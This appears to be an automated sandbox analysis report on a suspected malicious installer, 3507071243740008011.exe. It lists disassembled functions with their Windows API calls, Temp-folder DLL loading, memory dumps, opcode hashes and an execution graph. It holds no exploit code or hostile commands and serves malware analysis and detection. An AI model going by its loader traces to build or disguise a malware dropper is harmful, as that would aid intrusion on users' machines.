                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsy62D9.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWidelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsy62D9.tmp$C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll
                                                  • API String ID: 3109718747-2948858247
                                                  • Opcode ID: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                  • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                  • Opcode Fuzzy Hash: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                  • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
                                                  Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: FreeGlobal
                                                  • String ID:
                                                  • API String ID: 2979337801-0
                                                  • Opcode ID: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                  • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                  • Opcode Fuzzy Hash: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                  • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                  Function 00401DB3 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401DB6
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                  • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                  • Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
                                                  • Opcode Fuzzy Hash: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                  • Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D
                                                  Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                  • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                  • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                  • String ID:
                                                  • API String ID: 1148316912-0
                                                  • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                  • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                  • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                  • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                  Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                  • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                  • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                  • Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
                                                  • Opcode Fuzzy Hash: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                  • Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78
                                                  Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                  • Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
                                                  • Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                  • Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18
                                                  Function 00404AA2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                  • wsprintfW.USER32 ref: 00404B4C
                                                  • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                  • Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
                                                  • Opcode Fuzzy Hash: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                  • Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8
                                                  Function 00405B53 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B75
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3081826266
                                                  • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                  • Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
                                                  • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                  • Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD
                                                  Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                  • GetTickCount.KERNEL32 ref: 00402E8E
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                  • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                  • Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
                                                  • Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                  • Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC
                                                  Function 004038FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                  • GlobalFree.KERNEL32(?), ref: 0040391C
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3081826266
                                                  • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                  • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                  • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                  • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                  Function 00405B9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3507071243740008011.exe,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3507071243740008011.exe,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-224404859
                                                  • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                  • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                  • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                  • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                  Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                  • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                  • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                  • GlobalFree.KERNEL32(?), ref: 10001203
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                  • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                  • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                  • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                  Function 00405CD9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                  • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                  • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                  • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                  • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98

                                                  Execution Graph

                                                  Execution Coverage:0%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:100%
                                                  Total number of Nodes:1
                                                  Total number of Limit Nodes:0
                                                  execution_graph 81223 36d92df0 LdrInitializeThunk

                                                  Executed Functions

                                                  Function 36D935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1 36d935c0-36d935cc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2af69828eadd72cc7d790b077e71691c1745cd6ab2fd93e069bd2c2a75f4360a
                                                  • Instruction ID: 7c285d80951b3836e40425ea0b0e2b6ba546558ca6b0ebcb126118c8323f4f4b
                                                  • Opcode Fuzzy Hash: 2af69828eadd72cc7d790b077e71691c1745cd6ab2fd93e069bd2c2a75f4360a
                                                  • Instruction Fuzzy Hash: A1900271B4960402D20071988514B06100647D0201F65C412A542463CD87958A5565A2
